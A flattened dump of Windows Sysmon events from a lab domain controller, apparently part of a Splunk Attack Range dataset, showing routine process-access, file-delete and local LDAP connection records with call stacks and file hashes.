12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.036{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D2AB41AF9ED8B320FFC1D112CD3B3DE,SHA256=3C00D1CABE7D37BC504278A9FB550775151952231B73290A3387154880E9F4FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.554{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53709-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000010715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.554{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53709-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000010714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.507{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53708-false10.0.1.12-8000- 23542300x800000000000000010713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:15.208{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=787613594085E9168DAD20C0527D30C9,SHA256=097ADBA32BAAB0BB3C9A0EE45079390FE94C71485C28303B5C30C849982789AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:15.208{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C017D5136C956485970E33C9E559FA1C,SHA256=E1824F4A5093B5942D664824B8B81060EA48E505056C474BDD0FF1A4E9FCD93C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:15.067{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB87FFA1FF8B7C421CE74C26B0A9326C,SHA256=62C56243CE19B163FE5FCE244A3E21AE171AEE5C07D1FF3C69F0A113AF144304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:16.130{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7598EF64B478EA4831184B98BA3E32A,SHA256=18D068AA3E50BE572B6AA3EFEE13D10ECD5FAD79B462D6C2A71894D5E857FFCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:17.161{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D3950286365F3D2AB85C22A5E378D15,SHA256=BA139DFA92C17B222DD3850E1D12B2F63E3264A06AD5A5604994ACCFF72B6535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.879{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB86A30F529A3B30186532C84548EB14,SHA256=D66919AC4B9A0CB08B5720224EB975133A49D823010DDCF5E930551A20C1C672,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.817{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.817{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.801{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.801{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.801{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.801{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7101-00000000AE01}6632C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.786{266CAFBE-64C4-6064-9B00-00000000AE01}49246816C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000010821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.786{266CAFBE-64C4-6064-9B00-00000000AE01}49246816C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000010820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.786{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.786{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 23542300x800000000000000010818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.786{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=6A4DB970B26B3E484596A3099347CA52,SHA256=514FEB88EDC46E1004901F56BDEFB9AA65AAA5D68137D6D816374309F8FCD8CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.770{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.770{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.770{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 